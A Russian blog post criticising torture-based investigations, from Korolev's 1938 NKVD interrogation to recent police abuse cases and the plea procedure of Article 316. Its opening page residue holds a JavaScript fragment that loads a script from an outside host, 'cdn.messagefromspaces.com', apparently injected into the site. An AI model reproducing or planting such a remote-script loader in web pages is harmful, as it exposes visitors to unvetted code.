, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Игнорируя факты, в России создают условия для пыток

20 Дек

Приведу один пример.

По воспоминаниям дочери С.П. Королёва.

27 июня 1938 года в половине двенадцатого ночи в дверь 11-й квартиры Королевых на Конюшковской ул., д. 28 в Москве громко постучали: «Открывайте! НКВД». Пришли двое. Обыск продолжался всю ночь.

Утром 28 июня начался первый допрос, о чем свидетельствует копия протокола в книге дочери Сергея Павловича — Наталии Королевой. Допрашивал оперуполномоченный, сержант госбезопасности Быков. На первый вопрос, знает ли арестованный о причине ареста, Сергей Павлович сказал просто: «Нет, не знаю». В ответ мат, смачный плевок в лицо, удар сапогом в пах. Очнувшись, Королев увидел человека в белом халате. Проверив пульс, тот помог ему встать и сказал: «Страшного ничего нет».

После этого следователь сообщил ему, что он будет стоять на «конвейере» до тех пор, пока не подпишет показаний. Сергей Павлович стоял до вечера. Есть и пить не давали; спать не разрешали. Вечером пришел другой следователь — лейтенант госбезопасности Михаил Шестаков. Простояв всю ночь, рано утром, допрашиваемый вновь увидел сержанта Быкова…

Будущего Генерального конструктора обвиняли в том, что с 1935 года он входил в троцкистскую вредительскую организацию, проводил преступную работу по срыву отработки и сдачи на вооружение РККА новых образцов вооружения, т.е. в преступлениях ст. 58−7, 58−11 УК РСФСР.

Королёв на допросах был подвергнут пыткам — ему сломали обе челюсти, ударив Сергея Павловича графином по скуле. Королёв писал: «Следователи Шестаков и Быков подвергли меня физическим репрессиям и издевательствам».

В 1938 году, пытавшие его следователи, сломавшие заключенному челюсть и вскоре, после угроз расправиться с женой и дочерью, добившиеся признательных показаний, вряд ли задумывались о будущей судьбе подследственного. Через руки садистов проходили десятки ярких личностей и среди следователей было даже негласное соревнование https://tverdyi-znak.livejournal.com/2858858.html : кто у кого быстрее сломается и все подпишет.

Опубликованные в АиФ № 1−2, 2017 г. с. 10−11 воспоминания  космонавта А. Леонова о С.П. Королёве дополняют события, связанные с получением признательных показаний.

Вот как вёлся допрос С.П. Королёва следователем: «У тебя красивая молодая жена, Так вот, мы одну буквочку опустим, и она будет не Королёва, а Королёв, и мы бросим её к  зэкам на неделю. Дочка у тебя, ей 3 годика — тоже найдём куда её деть».

После этого С.П. Королёв  сказал: «И я подписал протокол…».

16 марта 1966 года Главный конструктор умер после неудачной полостной операции. Хирург Борис Петровский вспоминал   , http://maxpark.com/community/5206/content/5344469    что «он (Королев. — Авт.) скрывал, что у него были сломаны челюсти; он не мог широко открыть рот. Оперируя людей, прошедших ужасы репрессий 30-х годов, я довольно часто сталкивался с этим явлением. У меня нет никаких сомнений, что во время допросов в 1938 году Королеву сломали челюсти. Это обстоятельство и заставило нас сделать трахеотомию — разрез на горле, чтобы вставить трубку...» Сергею Павловичу было всего 59 лет.

Подобные методы пыточного судопроизводства не истреблены и в новой России.

Почему сейчас не опубликовать всё дело С.П. Королёва, и не рассказать в СМИ о том, что так расследовать нельзя. Возможно, не было бы и пыточного судопроизводства в стране.

Но вместо этого, законодательно был установлен особый порядок судебного разбирательства, при котором судья не исследует и не оценивает доказательства, собранные по уголовному делу, если обвиняемый согласен с предъявленным ему обвинением (статья 316 УПК РФ).

При этом согласие с предъявленным обвинением поощряется тем, что наказание не может превышать две трети  максимального срока или размера наиболее строгого наказания.

И такие дополнения в УПК РФ были приняты Государственной Думой 21 июня 2003 года, одобрены Советом Федерации 26 июня 2003 года, подписаны и обнародованы Президентом Российской Федерации В.В. Путиным, 4 июля 2003 года.

Прошло более 16 лет.

Всему миру стали известны методы «назначения» обвиняемым  садистами в мундирах  ОВД «Дальний»  в Казани. http://www.rg.ru/sujet/4582 /  .

За 2012 год в отношении полицейских Татарстана было возбуждено https://www.rbc.ru/society/27/09/2017/59cb61769a7947f810a82bf5     117 уголовных дел, вдвое больше, чем годом ранее. Тогда после изнасилования бутылкой из-под шампанского в казанском ОП «Дальний» скончался задержанный Сергей Назаров. Всего пострадавшими от произвола в «Дальнем» были признаны 14 человек.

Два года сотрудники Глазовского СИЗО издевались над заключенными, под пытками выбивая https://www.kazan.kp.ru/daily/26976/4035168/     из них признания.

Подполковник ФСИН  пытками заставил https://rusplt.ru/society/tsar-polyarnoy-sovyi-12078.html   заключенных сознаться в убийствах Анны Политковской, Ахмата Кадырова и Пола Хлебникова.

Расследование дела мэра Махачкалы Саида Амирова, также проходило с применением пыток  http://versia.ru/articles/2013/nov/18/delo_saida_amirova   .

Знаменитый публицист И. Гамаюнов в очерке:  «Человек на коленях*». Кто остановит пыточный конвейер следствия, вынуждающий задержанных брать на себя чужую вину», опубликованном в «Литературной газете»  http://lgz.ru/article/-19−6462−14−05−2014/chelovek-na-kolenyakh/  , раскрыл причины и методы такого расследования ещё 25 лет тому назад.

Такое судопроизводство, как утверждает Генеральный прокурор Юрий Чайка, привело к деградации https://www.rbc.ru/society/21/02/2018/5a8d75e69a7947394f7b3729   следствия.

Если в застенках  гестапо, из задержанных выбивали явки, связников, коды, пароли. Их заставляли под пытками говорить правду.

Возможно, так Мюллер раскрыл https://life.ru/t/%D0%B8%D1%81%D1%82%D0%BE%D1%80%D0%B8%D1%8F/1240589/osobyi_aghient_ghiestapo_kak_miullier_raskryl_riealnogho_shtirlitsa?&utm_referrer=https%3A%2F%2Fzen.yandex.com  реального «Штирлица», перевербовав  немецких коммунистов, которые шли на связь с  Вилли Леманом, самым ценным советским агентом в Германии.

То у Сергея Павловича Королёва  выбивали признание в том, чего он не совершал. Под пытками  требовали признать ложь, которую следователь изложил в постановлении о привлечении в качестве обвиняемого.

И это полученная, не редко, под пытками ложь, стала единственным доказательством при осуждении в современной России.

Конституция России (статья 2) утверждает, что Человек, его права и свободы являются высшей ценностью. Признание, соблюдение и защита прав и свобод человека и гражданина — обязанность государства.

При этом в статье 21 конкретизируется:

1. Достоинство личности охраняется государством. Ничто не может быть основанием для его умаления.

2. Никто не должен подвергаться пыткам, насилию, другому жестокому или унижающему человеческое достоинство обращению или наказанию.

Но нет исполнения обязанностей гаранта Конституции и вот, что происходит в действительности.

Ежегодно 600−700 тысяч осуждать  на одних только «признательных» показаниях обвиняемых, не исследуя и не давая оценки собранным по делу доказательствам на  относимость, допустимость, достоверность и достаточность для признания лица виновным.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.